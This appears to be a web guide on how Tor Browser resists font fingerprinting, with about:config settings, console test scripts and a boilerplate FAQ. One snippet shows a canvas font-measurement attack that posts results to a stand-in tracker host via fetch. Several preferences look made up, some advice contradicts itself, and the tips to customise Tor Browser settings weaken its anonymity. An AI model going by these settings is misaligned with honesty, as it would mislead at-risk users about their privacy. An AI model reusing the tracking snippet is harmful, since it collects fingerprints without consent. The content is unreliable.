Last updated: March 15, 2026

Tor Browser stops font fingerprinting by normalizing fonts across all users, the Standard security level provides default protection by blocking aggressive fingerprinting vectors, the Safer level allows only minimal system fonts, and the Safest level disables JavaScript access to font enumeration APIs entirely. Combined with letterboxing (gray margins that prevent window-size tracking), these defenses ensure trackers see the same fonts from your browser as from thousands of other Tor users, making you indistinguishable from the crowd.

Table of Contents

Understanding Font Fingerprinting

When a website loads text, the browser must render that text using available fonts. Each operating system ships with different fonts pre-installed, and users often install additional fonts for design work, programming, or personal preference. This creates a unique combination that can identify you across sessions and websites.

The attack works by JavaScript code querying the browser’s font capabilities. The script measures how long it takes to render text with different fonts, or checks which fonts are available via the CSS font enumeration API. By combining this information, trackers build a fingerprint that remains stable even when you clear cookies, use private browsing, or change your IP address.

Tor Browser addresses this threat through several interconnected mechanisms designed to normalize the font environment across all users.

Font Restriction Levels

Tor Browser provides three font restriction levels accessible through the security slider. Navigate to about:config and search for font.restrict to see these settings in detail, or access them through the Tor Button menu under “Security Settings.”

The Standard level provides the default balance between usability and privacy. This setting allows most system fonts while blocking the most aggressive fingerprinting vectors. For typical browsing, this level offers sufficient protection without sacrificing functionality.

The Safer level restricts fonts further, allowing only a minimal set of fonts known to be widely available across operating systems. This reduces the uniqueness of your browser fingerprint significantly but may cause some websites to display fallback fonts.

The Safest level provides maximum protection by limiting fonts to a minimal set and disabling JavaScript access to font enumeration APIs. This level ensures the most consistent fingerprint across Tor Browser users but may break functionality on websites with complex typography requirements.

You can also configure specific font allowlists and blocklists using the font.whitelist and font.blacklist preferences in about:config.

The Letterboxing Defense

Tor Browser implements letterboxing as a primary defense against window-based fingerprinting. When enabled, Tor Browser adds gray margins around web content to maintain a consistent window size regardless of the actual content dimensions. This prevents trackers from measuring your exact viewport size, which correlates with your screen resolution and installed fonts.

The letterboxing implementation specifically targets the practice of measuring rendered text dimensions. By constraining the content area to fixed dimensions, Tor Browser prevents websites from detecting which fonts are available based on how text renders. To enable or modify letterboxing behavior:

// Check letterboxing status in about:config
// browser.letterbox.enabled should be true
// Adjust the minimum inner dimensions
// privacy.resistFingerprinting.minInnerWidth
// privacy.resistFingerprinting.minInnerHeight

The minimum inner dimensions settings determine the smallest size Tor Browser will report to websites. Setting these to common values like 1024x768 or 1280x720 helps blend your browser with other users.

Font Loading Restrictions

Tor Browser modifies the font loading process to prevent fingerprinting through timing attacks. When a webpage attempts to load a font, Tor Browser may substitute the requested font with a fallback, measuring the loading time consistently across all users rather than revealing which fonts are actually available.

The browser.display.use_font_map_smoothing preference controls font smoothing behavior that could otherwise reveal information about your graphics hardware. Tor Browser enables this uniformly to prevent hardware fingerprinting.

For developers testing their websites, you can observe how Tor Browser handles font requests by enabling the browser’s font debugging. Open the Developer Tools (Ctrl+Shift+I), navigate to the Network tab, and observe how font requests are processed differently than in standard browsers.

Configuring Advanced Font Settings

For power users seeking fine-grained control, Tor Browser exposes several about:config preferences. The following configurations enhance font fingerprinting protection:

Disable CSS font enumeration
This prevents websites from listing available fonts
font.dom.always_return_array = false

Limit font access for canvas rendering
Prevents font-based canvas fingerprinting
privacy.resistFingerprinting = true

Randomize fonts for canvas operations
Adds noise to font-based measurements
canvas.randomize-font = true

The privacy.resistFingerprinting boolean enables the fingerprinting resistance system, which affects fonts, canvas, WebGL, and other fingerprinting vectors. Setting this to true is recommended for maximum protection.

Platform-Specific Considerations

Font availability differs significantly across operating systems, which creates inherent challenges for fingerprinting defense. Tor Browser addresses these differences by normalizing the exposed font environment, but some platform-specific behaviors remain.

On Windows, the GDI subsystem provides font rendering that differs from Quartz on macOS or FreeType on Linux. Tor Browser attempts to mask these differences, but certain low-level font queries may still reveal operating system information. The Tor Project continuously updates the font normalization logic to address new fingerprinting techniques.

Linux users often have the most diverse font installations due to the distribution model. If you run Tor Browser on Linux, consider removing unnecessary fonts from your system to reduce your fingerprint uniqueness. The fc-list command enumerates installed fonts, helping you identify candidates for removal.

Testing Your Font Fingerprint

To verify Tor Browser’s font fingerprinting protection, use the Cover Your Tracks (formerly Panopticlick) test from the Electronic Frontier Foundation. This tool analyzes your browser’s fingerprint and provides an uniqueness score. A well-configured Tor Browser should show high entropy reduction compared to unprotected browsers.

Another useful resource is the AmIUnique project, which tracks browser fingerprint distributions across users. Compare your results before and after adjusting Tor Browser’s font settings to measure the effectiveness of your configuration changes.

You can also perform manual tests using the browser console to see what information websites can access:

// Test font detection script behavior
// In Tor Browser, this will show limited results
document.fonts.check("12px Arial");
document.fonts.check("12px NonExistentFont");

// Check available font count
document.fonts.size;

Best Practices for Maximum Protection

Combining Tor Browser’s built-in protections with good browsing habits provides the strongest defense against font fingerprinting:

Avoid installing unusual or custom fonts on your system if you use Tor Browser regularly. Each unique font increases your fingerprint entropy. If you need specific fonts for work, consider using a separate browser profile.

Keep Tor Browser updated to receive the latest fingerprinting defenses. The Tor Project actively monitors new fingerprinting techniques and releases updates to address them. Enable automatic updates or check for updates manually through the Tor Button menu.

Resist the temptation to customize Tor Browser’s appearance excessively. Themes, custom CSS, and userChrome.css modifications can make your browser more unique. The default Tor Browser appearance is designed to maximize blending with other users.

When using the Safest security level, test critical websites you visit regularly. Some legitimate sites require JavaScript font access for proper functionality. You can create exceptions for trusted sites while maintaining the highest protection level elsewhere.

Font Fingerprinting Attack Vectors

Understanding how trackers extract font information helps appreciate Tor Browser’s defenses:

Vector 1 - CSS Fallback Chain Timing Trackers measure how long it takes to render text with progressively less common fonts. If a font isn’t available, rendering takes longer due to fallback processing. By timing multiple fonts, attackers build a unique profile.

Vector 2 - Canvas Text Measurement JavaScript can render text to an HTML canvas element and measure pixel dimensions. Different fonts produce different widths for identical text, revealing which fonts are installed.

// Example of canvas fingerprinting attack
function detectFonts() {
    const canvas = document.createElement("canvas");
    const ctx = canvas.getContext("2d");
    const testString = "mmmmmmmmmlli";
    const textSize = "72px";

    const fonts = ["Arial", "Verdana", "Times New Roman", "Courier"];
    const measurements = {};

    fonts.forEach(font => {
        ctx.font = `${textSize} ${font}`;
        const width = ctx.measureText(testString).width;
        measurements[font] = width;
    });

    // Send measurements to tracker server
    fetch('//tracker.example.com/fonts', {
        method: 'POST',
        body: JSON.stringify(measurements)
    });
}

Tor Browser prevents this attack by:

  1. Limiting available fonts to a standard set
  2. Disabling the Canvas API fingerprinting methods
  3. Randomizing canvas rendering to produce inconsistent results

Vector 3 - CSS Font Load Events Websites can listen to @font-face load events to determine which fonts successfully loaded, inferring system fonts.

Vector 4 - DOM Metrics Measurement JavaScript measures DOM element heights and widths, which vary based on available fonts. Different font metrics (ascender height, baseline, x-height) produce detectable differences.

Tor Browser’s letterboxing defense prevents this by constraining the content area to fixed dimensions.

Security Levels Comparison

Feature Standard Safer Safest
System Fonts Allowed Most Minimal Core Only
JavaScript Enabled Yes Yes No
Font Enumeration Blocked Partial Full Full
Canvas Fingerprinting Mitigated Mitigated Blocked
WebGL Fingerprinting Mitigated Mitigated Blocked
Plugin Fingerprinting Mitigated Mitigated Blocked
User Experience Impact Minimal Moderate High

Technical Deep Dive - Font Normalization

Tor Browser implements font normalization through several mechanisms:

// Tor Browser's privacy.resistFingerprinting logic
// (Simplified conceptual example)

const SAFE_FONTS = [
    "Arial", "Helvetica", "Times New Roman", "Courier New",
    "DejaVu Sans", "Liberation Sans", "Liberation Serif"
];

function normalizeFonts(requestedFont) {
    // Only allow fonts in the safe list
    if (SAFE_FONTS.includes(requestedFont)) {
        return requestedFont;
    }

    // For unknown fonts, return a generic fallback
    const fontFamily = requestedFont.toLowerCase();
    if (fontFamily.includes('serif')) {
        return "Times New Roman";
    } else if (fontFamily.includes('mono')) {
        return "Courier New";
    } else {
        return "Arial";  // Default sans-serif fallback
    }
}

// Font enumeration returns consistent results across all users
function enumerateFonts() {
    // Always return the same set, regardless of system
    return SAFE_FONTS;
}

This normalization ensures that JavaScript queries for available fonts always receive identical results, eliminating the fingerprinting vector.

Identifying Font Fingerprinting Attempts

Monitor your Tor Browser console for suspicious font-related activity:

// Detection script - run in browser console
// Watch for font enumeration attempts

const originalGetComputedStyle = window.getComputedStyle;
window.getComputedStyle = function(element, pseudoElement) {
    const result = originalGetComputedStyle.call(this, element, pseudoElement);

    if (result.font || result.fontFamily) {
        console.warn("Potential font fingerprinting attempt detected");
        console.trace();
    }

    return result;
};

// Monitor Canvas operations
const originalMeasureText = CanvasRenderingContext2D.prototype.measureText;
CanvasRenderingContext2D.prototype.measureText = function(text) {
    console.warn("Canvas text measurement detected - potential fingerprinting");
    return originalMeasureText.call(this, text);
};

In Safest mode, many of these operations will be unavailable, blocking the attack.

Testing Specific Font Protection

Create a test to verify Tor Browser’s font protections:

<!DOCTYPE html>
<html>
<head>
    <title>Tor Browser Font Protection Test</title>
</head>
<body>
    <h1>Font Fingerprinting Defense Test</h1>

    <div id="results"></div>

    <script>
    const results = document.getElementById('results');

    // Test 1: Font enumeration
    try {
        console.log("Test 1: Font Enumeration");
        const fonts = Array.from(document.fonts).map(f => f.family);
        console.log("Enumerated fonts:", fonts);
        results.innerHTML += "<p>Fonts enumerated: " + fonts.length + "</p>";
    } catch (e) {
        results.innerHTML += "<p>Font enumeration blocked: " + e.message + "</p>";
    }

    // Test 2: Canvas text rendering
    try {
        console.log("Test 2: Canvas Text Measurement");
        const canvas = document.createElement('canvas');
        const ctx = canvas.getContext('2d');
        ctx.font = "16px Arial";
        const width1 = ctx.measureText("test").width;

        ctx.font = "16px NonexistentFont";
        const width2 = ctx.measureText("test").width;

        if (width1 === width2) {
            results.innerHTML += "<p>Canvas measurements normalized: Good</p>";
        } else {
            results.innerHTML += "<p>Canvas reveals font differences: Vulnerable</p>";
        }
    } catch (e) {
        results.innerHTML += "<p>Canvas test blocked: " + e.message + "</p>";
    }

    // Test 3: WebGL renderer fingerprinting
    try {
        console.log("Test 3: WebGL Detection");
        const canvas = document.createElement('canvas');
        const gl = canvas.getContext('webgl');
        const renderer = gl.getParameter(gl.RENDERER);
        results.innerHTML += "<p>WebGL renderer: " + renderer + "</p>";
    } catch (e) {
        results.innerHTML += "<p>WebGL blocked or unavailable: Good</p>";
    }
    </script>
</body>
</html>

View this test in Tor Browser at different security levels to observe how defenses vary.

Complementary Protections

Font fingerprinting is just one of many fingerprinting vectors. Combine Tor Browser’s protections with these additional measures:

Canvas Fingerprinting - Tor Browser randomizes canvas rendering through privacy.resistFingerprinting. Test at coverYourTracks.eff.org to verify protection.

WebGL Fingerprinting - GPU capabilities reveal information about hardware. Tor Browser disables WebGL in Safest mode.

Timezone Fingerprinting - privacy.resistFingerprinting sets timezone to UTC for all users.

Language Fingerprinting - Accept-Language headers are normalized to match Tor Browser’s default language.

The cumulative effect - even if one fingerprinting vector leaks information, the others remain protected, maintaining anonymity through a diverse fingerprint pool.

Font Configuration for Maximum Privacy

For maximum privacy, manually configure these about:config settings:

Disable font smoothing (can reveal hardware)
browser.display.use_font_map_smoothing = false

Disable dynamic font loading
dom.webfont.fontmanager.enabled = false

Restrict fonts to baseline set
font.default.sans-serif = "Arial"
font.default.serif = "Times New Roman"
font.default.monospace = "Courier New"

Disable font size zooming per-domain
browser.zoom.text_only = true

Apply these in addition to the security slider settings for defense-in-depth.

Monitoring Font Fingerprinting Threats

Watch for new font fingerprinting techniques:

Subscribe to:

The threat environment continuously evolves. New JavaScript APIs (like Font Metrics API) may introduce new vectors requiring Tor Project updates.

Frequently Asked Questions

Who is this article written for?

This article is written for developers, technical professionals, and power users who want practical guidance. Whether you are evaluating options or implementing a solution, the information here focuses on real-world applicability rather than theoretical overviews.

How current is the information in this article?

We update articles regularly to reflect the latest changes. However, tools and platforms evolve quickly. Always verify specific feature availability and pricing directly on the official website before making purchasing decisions.

Are there free alternatives available?

Free alternatives exist for most tool categories, though they typically come with limitations on features, usage volume, or support. Open-source options can fill some gaps if you are willing to handle setup and maintenance yourself. Evaluate whether the time savings from a paid tool justify the cost for your situation.

Can I trust these tools with sensitive data?

Review each tool’s privacy policy, data handling practices, and security certifications before using it with sensitive data. Look for SOC 2 compliance, encryption in transit and at rest, and clear data retention policies. Enterprise tiers often include stronger privacy guarantees.

What is the learning curve like?

Most tools discussed here can be used productively within a few hours. Mastering advanced features takes 1-2 weeks of regular use. Focus on the 20% of features that cover 80% of your needs first, then explore advanced capabilities as specific needs arise.

Related Articles